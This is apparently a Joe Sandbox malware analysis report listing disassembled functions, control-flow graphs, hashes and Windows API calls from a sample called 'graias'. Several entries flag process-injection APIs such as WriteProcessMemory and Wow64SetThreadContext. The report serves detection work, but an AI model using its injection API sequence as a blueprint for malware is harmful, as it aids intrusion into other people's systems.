                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000006.00000002.1731950619.0000000006D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D00000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_6d00000_graias.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 1bc9aa1c22fb6d7434b684ac242bbc472ad9cbd3e22b2fff544801216b631900
                                                                                                                                                                                                                                            • Instruction ID: 79d1f05d81c9f3286ff0f07b791b50a2912a27f9e09b0d2dc3105ecf9ed60db0
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1bc9aa1c22fb6d7434b684ac242bbc472ad9cbd3e22b2fff544801216b631900
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1612C775D0071A8FDB54DF68C880AD9F7B1FF99300F1586AAD858A7251EB70AAC4CF90
                                                                                                                                                                                                                                            Function 06D0FA7C Relevance: 5.3, Strings: 4, Instructions: 287COMMON
                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                            control_flow_graph 769 6d0fa7c-6d0fa83 770 6d0fa85-6d0fa95 769->770 771 6d0fa0e call 6d0de74 769->771 773 6d0fd23-6d0fd75 770->773 774 6d0fa9b-6d0faac call 6d05630 770->774 775 6d0fa13-6d0fa16 771->775 812 6d0fd77-6d0fd7c 773->812 813 6d0fdcc-6d0fdd4 773->813 779 6d0fab2-6d0fabb call 6d05798 774->779 780 6d0fca9-6d0fcad 774->780 786 6d0fad3-6d0fadb 779->786 787 6d0fabd-6d0fac3 779->787 782 6d0fcc9-6d0fcdb 780->782 783 6d0fcaf-6d0fcc1 780->783 791 6d0fce9-6d0fced 782->791 792 6d0fcdd-6d0fce3 782->792 783->782 795 6d0fae2-6d0fae5 786->795 796 6d0fadd-6d0fae0 786->796 793 6d0fac5 787->793 794 6d0fac7-6d0fac9 787->794 800 6d0fd1b-6d0fd22 791->800 801 6d0fcef-6d0fd03 791->801 797 6d0fce5 792->797 798 6d0fce7 792->798 793->786 794->786 802 6d0fae8-6d0faf2 795->802 796->802 797->791 798->791 801->800 804 6d0fd05-6d0fd0c 801->804 809 6d0fb00-6d0fb02 802->809 810 6d0faf4-6d0fafa 802->810 804->800 806 6d0fd0e-6d0fd16 804->806 806->800 809->780 811 6d0fb08-6d0fb11 call 6d05798 809->811 814 6d0fafc 810->814 815 6d0fafe 810->815 821 6d0fb13-6d0fb19 811->821 822 6d0fb29-6d0fb31 811->822 812->813 817 6d0fd7e-6d0fd87 call 6d06850 812->817 819 6d0fddc-6d0fddf 813->819 814->809 815->809 817->813 826 6d0fd89-6d0fd8d 817->826 824 6d0fb1b 821->824 825 6d0fb1d-6d0fb1f 821->825 827 6d0fb33-6d0fb36 822->827 828 6d0fb38-6d0fb3b 822->828 824->822 825->822 826->813 829 6d0fd8f-6d0fda2 call 6d06850 826->829 830 6d0fb3e-6d0fb48 827->830 828->830 834 6d0fda4-6d0fda6 829->834 835 6d0fda8-6d0fdb9 829->835 836 6d0fb60-6d0fb7c call 6d05548 830->836 837 6d0fb4a-6d0fb50 830->837 839 6d0fdbf-6d0fdc1 834->839 835->839 836->780 848 6d0fb82-6d0fba4 836->848 840 6d0fb52 837->840 841 6d0fb54-6d0fb56 837->841 839->813 842 6d0fdc3-6d0fdca 839->842 840->836 841->836 842->813 845 6d0fde0-6d0fe49 842->845 873 6d0fe50-6d0fe8f 845->873 874 6d0fe4b 845->874 851 6d0fba6-6d0fbbb call 6d0de64 848->851 852 6d0fbfb-6d0fc0c 848->852 860 6d0fbd5 851->860 861 6d0fbbd-6d0fbc1 851->861 857 6d0fc26 852->857 858 6d0fc0e-6d0fc24 852->858 863 6d0fc2b-6d0fc3a 857->863 858->863 862 6d0fbd7-6d0fbd9 860->862 861->860 864 6d0fbc3-6d0fbc7 861->864 862->852 865 6d0fbdb-6d0fbf6 call 6d01228 862->865 866 6d0fc49-6d0fc4d 863->866 867 6d0fc3c-6d0fc44 call 6d066bc 863->867 864->860 869 6d0fbc9-6d0fbd3 864->869 865->852 866->780 872 6d0fc4f-6d0fc72 call 6d066cc 866->872 867->866 869->862 881 6d0fc92-6d0fc99 872->881 882 6d0fc74-6d0fc8d call 6d066cc 872->882 877 6d0fe91 873->877 878 6d0fe96-6d0ff40 873->878 874->873 877->878 884 6d0ff42 878->884 885 6d0ff47-6d0ff73 878->885 881->780 883 6d0fc9b-6d0fca4 call 6d066bc 881->883 882->881 883->780 884->885 891 6d0ff33-6d0ff34 885->891 892 6d0feb3-6d0feb7 891->892 893 6d0feb9-6d0fed1 892->893 894 6d0feeb-6d0fef5 892->894 900 6d0fed3-6d0fed4 893->900 901 6d0fe77-6d0fe7c 893->901 895 6d0fef7 894->895 896 6d0fefc-6d0ff14 894->896 895->896 897 6d0ff16-6d0ff23 896->897 898 6d0ff2d-6d0ff31 896->898 906 6d0fee5-6d0ff8a 897->906 898->891 898->892 900->901 901->897 903 6d0fe82-6d0fe83 901->903 903->897
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000006.00000002.1731950619.0000000006D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D00000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_6d00000_graias.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID: Hhq$$dq$$dq$$dq
                                                                                                                                                                                                                                            • API String ID: 0-1693755344
                                                                                                                                                                                                                                            • Opcode ID: 02c03d258d1f2350b9352eba1fe5164dc3d87df81fcfda800ce4a3d18eed7438
                                                                                                                                                                                                                                            • Instruction ID: 4e52664fc357fbb2b4a7d7ace3360dc59c48f1fe8623290d5ffdc758af65c2b0
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 02c03d258d1f2350b9352eba1fe5164dc3d87df81fcfda800ce4a3d18eed7438
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 73A1BE31B102058FEBB4DF74C851BAA73A2EF84314F34856ADC168B2D1DB75D886CBA1
                                                                                                                                                                                                                                            Function 06D08B81 Relevance: 2.8, Strings: 2, Instructions: 330COMMON
                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                            control_flow_graph 1021 6d08b81-6d08b8c 1022 6d08b14-6d08b7a 1021->1022 1023 6d08b8e-6d08bc6 1021->1023 1028 6d08f89-6d08fb4 1023->1028 1029 6d08bcc-6d08bdf call 6d067c0 1023->1029 1046 6d08fbb-6d0900b 1028->1046 1035 6d08be1-6d08beb 1029->1035 1036 6d08bf3-6d08c19 1029->1036 1035->1036 1036->1046 1047 6d08c1f-6d08c35 call 6d067d0 1036->1047 1078 6d0902c-6d09034 1046->1078 1079 6d0900d-6d09021 1046->1079 1051 6d08d17-6d08d1b 1047->1051 1052 6d08c3b-6d08c55 1047->1052 1054 6d08d2b-6d08d3b call 6d067e0 1051->1054 1055 6d08d1d-6d08d23 1051->1055 1059 6d08c57-6d08c65 1052->1059 1060 6d08c6d-6d08c89 1052->1060 1062 6d08d72-6d08dac call 6d067f0 call 6d05c28 1054->1062 1063 6d08d3d-6d08d66 1054->1063 1055->1054 1059->1060 1073 6d08ce6-6d08d0a 1060->1073 1074 6d08c8b-6d08c96 1060->1074 1083 6d08dc4-6d08de0 1062->1083 1084 6d08dae-6d08dbc 1062->1084 1091 6d08d14 1073->1091 1092 6d08d0c 1073->1092 1085 6d08c98-6d08c9e 1074->1085 1086 6d08cae-6d08cbf 1074->1086 1079->1078 1101 6d08de2-6d08ded 1083->1101 1102 6d08e54-6d08e78 1083->1102 1084->1083 1089 6d08ca0 1085->1089 1090 6d08ca2-6d08ca4 1085->1090 1097 6d08cc1-6d08cc4 1086->1097 1098 6d08cc6-6d08cc9 1086->1098 1089->1086 1090->1086 1091->1051 1092->1091 1099 6d08ccc-6d08cd3 1097->1099 1098->1099 1103 6d08cd9-6d08ce4 1099->1103 1108 6d08e05-6d08e12 1101->1108 1109 6d08def-6d08df5 1101->1109 1112 6d08e82 1102->1112 1113 6d08e7a 1102->1113 1103->1073 1103->1074 1110 6d08e14-6d08e20 1108->1110 1111 6d08e26-6d08e52 call 6d028fc 1108->1111 1114 6d08df7 1109->1114 1115 6d08df9-6d08dfb 1109->1115 1110->1111 1111->1101 1111->1102 1112->1028 1113->1112 1114->1108 1115->1108
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000006.00000002.1731950619.0000000006D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D00000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_6d00000_graias.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID: PHdq$PHdq
                                                                                                                                                                                                                                            • API String ID: 0-1995607813
                                                                                                                                                                                                                                            • Opcode ID: 4b538e9f1850268a31d1af0e5ce5f5e827174dc0cb833138aa8fed05f32c3a87
                                                                                                                                                                                                                                            • Instruction ID: e03618b356bb9c3272e23f0b7d71cf7aee3a6217f79a3432a8b21af356fd9cb9
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4b538e9f1850268a31d1af0e5ce5f5e827174dc0cb833138aa8fed05f32c3a87
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 02D11634B002148FDB58DF68D998AA9BBF2FF88711F1545A9E406EB3A1DB31EC45CB50
                                                                                                                                                                                                                                            Function 06D06EF1 Relevance: 1.8, Strings: 1, Instructions: 587COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000006.00000002.1731950619.0000000006D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D00000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_6d00000_graias.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID: (hq
                                                                                                                                                                                                                                            • API String ID: 0-4060669308
                                                                                                                                                                                                                                            • Opcode ID: 25d5aa3badd6bcb614b6b36f6ad060cc5b242ebddf818f2ca8473fcce6863045
                                                                                                                                                                                                                                            • Instruction ID: 64c603239b764315198a9deaec2bbc2adada164f4715aeba6dd4a767b12d5a56
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 25d5aa3badd6bcb614b6b36f6ad060cc5b242ebddf818f2ca8473fcce6863045
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B5321734B002149FDB98DF68D494BAD7BF2BF89310F1485A9E4099B3A1DB31EC46CB91
                                                                                                                                                                                                                                            Function 06E05FB5 Relevance: 1.7, APIs: 1, Instructions: 249processCOMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 06E061F6
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000006.00000002.1732317789.0000000006E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E00000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_6e00000_graias.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: CreateProcess
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 963392458-0
                                                                                                                                                                                                                                            • Opcode ID: bfa37f68c51242d955088d6c18ba5f61a8afccb00670caaa28b81fcb51ae1a95
                                                                                                                                                                                                                                            • Instruction ID: ab1020d9c9d2e37a1d1a27b54c0ec18f62a3b732f0bbacc9339fea216c8e637e
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: bfa37f68c51242d955088d6c18ba5f61a8afccb00670caaa28b81fcb51ae1a95
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1EA14971D00319DFEB60CFA8C841BEEBBB2BF48314F148569E848A7290DB759995CF91
                                                                                                                                                                                                                                            Function 06E05FC0 Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 06E061F6
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000006.00000002.1732317789.0000000006E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E00000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_6e00000_graias.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: CreateProcess
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 963392458-0
                                                                                                                                                                                                                                            • Opcode ID: b006434f15f56e668018878664eef8c054d0d809f622450396d13b895bf6699b
                                                                                                                                                                                                                                            • Instruction ID: 26d7ae5a0febbb248ea582509ae261f6512168c7cfa83e40d374bc5dfe8850e4
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b006434f15f56e668018878664eef8c054d0d809f622450396d13b895bf6699b
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F7914871D003199FEB60CFA8C841BEEBBB2BF48314F148569E808A7290DB749995CF91
                                                                                                                                                                                                                                            Function 00EB590C Relevance: 1.6, APIs: 1, Instructions: 99COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • CreateActCtxA.KERNEL32(?), ref: 00EB59C9
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000006.00000002.1713673829.0000000000EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EB0000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_eb0000_graias.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Create
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 2289755597-0
                                                                                                                                                                                                                                            • Opcode ID: 6d64aef08589ee8e24c71f34d489a7b6a80222418418040e63d7d58e7487577c
                                                                                                                                                                                                                                            • Instruction ID: e91a4b60fa51762e163f80e61dc4954a621dfa460fbdcc5c27a7698b8464928f
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6d64aef08589ee8e24c71f34d489a7b6a80222418418040e63d7d58e7487577c
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: FD41F2B1C00719CADB24CFAAC985BDEBBB5BF88304F20856AD408BB251DB756945CF50
                                                                                                                                                                                                                                            Function 00EB449C Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • CreateActCtxA.KERNEL32(?), ref: 00EB59C9
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000006.00000002.1713673829.0000000000EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EB0000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_eb0000_graias.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Create
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 2289755597-0
                                                                                                                                                                                                                                            • Opcode ID: 74f191bf364d134e976f756c583ae0e16aa8d5ea78c0b481348b3ae9bb90769a
                                                                                                                                                                                                                                            • Instruction ID: a8f7f836d8703a36ca744ad08f229ead5e2f6b90229b3a4e929f439773b9cfd2
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 74f191bf364d134e976f756c583ae0e16aa8d5ea78c0b481348b3ae9bb90769a
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4541DFB1C00719CBDB24CFAAC984BDEBBB5BF88304F20856AD408BB251DB756945CF90
                                                                                                                                                                                                                                            Function 06D232F8 Relevance: 1.6, APIs: 1, Instructions: 83COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000006.00000002.1732113047.0000000006D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D20000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_6d20000_graias.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: CreateFromIconResource
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 3668623891-0
                                                                                                                                                                                                                                            • Opcode ID: 31d98be7d9c3d7eea63325f5ddb9a6bfda583f8ad0dd7bcce6dccf51ed62f03c
                                                                                                                                                                                                                                            • Instruction ID: f01c9bf892dee4a80aa6c05ceb11945d7f6438d820dbccb3a7c982cf2251c0cd
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 31d98be7d9c3d7eea63325f5ddb9a6bfda583f8ad0dd7bcce6dccf51ed62f03c
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 17319A728043999FCB11CFA9C800ADEBFF9EF09320F14805AF954A7261C7399950DFA1
                                                                                                                                                                                                                                            Function 06E05D30 Relevance: 1.6, APIs: 1, Instructions: 71injectionCOMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 06E05DC8
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000006.00000002.1732317789.0000000006E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E00000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_6e00000_graias.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: MemoryProcessWrite
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 3559483778-0
                                                                                                                                                                                                                                            • Opcode ID: fb2173397ebbecaeaef2c38b02c4edcd321c4f233f4a30412f574f9ae874aae2
                                                                                                                                                                                                                                            • Instruction ID: f018543c8649a793a56295e70f1d15f777bc984622468ef1019c41b508ee0b24
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: fb2173397ebbecaeaef2c38b02c4edcd321c4f233f4a30412f574f9ae874aae2
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 102134B19003599FDB10CFA9C985BDEBBF5FF48320F14842AE958A7280C7789941CF60
                                                                                                                                                                                                                                            Function 0291787A Relevance: 1.6, APIs: 1, Instructions: 70COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • DrawTextExW.USER32(?,?,?,?,?,?), ref: 02917917
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000006.00000002.1716776800.0000000002910000.00000040.00000800.00020000.00000000.sdmp, Offset: 02910000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_2910000_graias.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: DrawText
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 2175133113-0
                                                                                                                                                                                                                                            • Opcode ID: c0ca3a02228219b7b85abcc19a0a02813a7cee7066f675596fe62dd1395a08a2
                                                                                                                                                                                                                                            • Instruction ID: 871fd2e81734645657778af909553f0101c13590bb874c9e1578c7d3456c8cf1
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c0ca3a02228219b7b85abcc19a0a02813a7cee7066f675596fe62dd1395a08a2
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9831E2B5D0024A9FCB10CF9AD884AEEFBF5EF48324F24842AE419A7210D774A545CFA0
                                                                                                                                                                                                                                            Function 02917880 Relevance: 1.6, APIs: 1, Instructions: 69COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • DrawTextExW.USER32(?,?,?,?,?,?), ref: 02917917
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000006.00000002.1716776800.0000000002910000.00000040.00000800.00020000.00000000.sdmp, Offset: 02910000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_2910000_graias.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: DrawText
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 2175133113-0
                                                                                                                                                                                                                                            • Opcode ID: dad43f5e1d09c533ba2f23b2edf878696fe44cb840deabd53068bfc040299d2d
                                                                                                                                                                                                                                            • Instruction ID: c96d904ef4fa9fb5cc3289c704be09f6f1c75a72ad22ae5bb81a68ec2a462fcf
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: dad43f5e1d09c533ba2f23b2edf878696fe44cb840deabd53068bfc040299d2d
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D521C3B5D0024A9FDB10CF9AD984ADEFBF9FB48324F14842AE519A7210D774A544CFA0
                                                                                                                                                                                                                                            Function 06E05D38 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 06E05DC8
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000006.00000002.1732317789.0000000006E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E00000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_6e00000_graias.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: MemoryProcessWrite
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 3559483778-0
                                                                                                                                                                                                                                            • Opcode ID: bca0e04154e9304895310eb7378c555296da26d9ed3af0ddfcb2ff4bf247304f
                                                                                                                                                                                                                                            • Instruction ID: c54a3a65d4cf86a62c6e00d0bffc8603c51d3b53ec449a92b15d8be437452512
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: bca0e04154e9304895310eb7378c555296da26d9ed3af0ddfcb2ff4bf247304f
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: EF2127B19003099FDB10CFA9C985BDEBBF5FF48324F10842AE918A7240D7789940DFA0
                                                                                                                                                                                                                                            Function 06E05E20 Relevance: 1.6, APIs: 1, Instructions: 67COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 06E05EA8
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000006.00000002.1732317789.0000000006E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E00000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_6e00000_graias.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: MemoryProcessRead
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 1726664587-0
                                                                                                                                                                                                                                            • Opcode ID: cbeac24dd2211177f5452c288db37f7ded004fbbaf6bea43fa299994eff5e968
                                                                                                                                                                                                                                            • Instruction ID: d5b706789ce16353fdb455202fc8c9e524602ebb3a7d5f178ff9429f2842cc60
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: cbeac24dd2211177f5452c288db37f7ded004fbbaf6bea43fa299994eff5e968
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 742125B1800309DFDB10CFAAC885AEEFBF5FF48320F10842AE958A7240D7789541DBA0
                                                                                                                                                                                                                                            Function 06E05B99 Relevance: 1.6, APIs: 1, Instructions: 67threadCOMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06E05C1E
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000006.00000002.1732317789.0000000006E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E00000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_6e00000_graias.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: ContextThreadWow64
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 983334009-0
                                                                                                                                                                                                                                            • Opcode ID: d1f76f0b3f81d752577ace648f5c8b4bc3ca1b7734b3556c41760847803c823b
                                                                                                                                                                                                                                            • Instruction ID: ad66d8be0faa4bf68fc3f023ec58c73295d22ace6fbe3bb8aca50fa08f684375
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d1f76f0b3f81d752577ace648f5c8b4bc3ca1b7734b3556c41760847803c823b
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C72139B1D003099FDB10DFAAC585BEEBBF4EF58324F14842AD459AB240DB789945CFA1
                                                                                                                                                                                                                                            Function 00EBDE58 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,00EBE28E,?,?,?,?,?), ref: 00EBE34F
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000006.00000002.1713673829.0000000000EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EB0000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_eb0000_graias.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: DuplicateHandle
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 3793708945-0
                                                                                                                                                                                                                                            • Opcode ID: 2a2e7b7d4d8517fea0e914fdb8104ed99c16e3ea7d641d91d9c42c277e763886
                                                                                                                                                                                                                                            • Instruction ID: b4950059d2e9ba77162b3345346e8ef99c530592468a82d3b1a8a909c034825d
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2a2e7b7d4d8517fea0e914fdb8104ed99c16e3ea7d641d91d9c42c277e763886
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7A21E5B5900249AFDB10CF9AD585ADEBBF9FB48320F14841AE914A7350D374A940CFA0
                                                                                                                                                                                                                                            Function 06E05E28 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 06E05EA8
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000006.00000002.1732317789.0000000006E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E00000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_6e00000_graias.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: MemoryProcessRead
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 1726664587-0
                                                                                                                                                                                                                                            • Opcode ID: 2d255ff2dd6066d9a9a0f6a0cff5e8ae3770cc9f18e71a9db5a41afa1d23583e
                                                                                                                                                                                                                                            • Instruction ID: f5894c22b5a77eb7fceced37d4a4fd8be94256fcd39d16b221394684cedb6fe9
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2d255ff2dd6066d9a9a0f6a0cff5e8ae3770cc9f18e71a9db5a41afa1d23583e
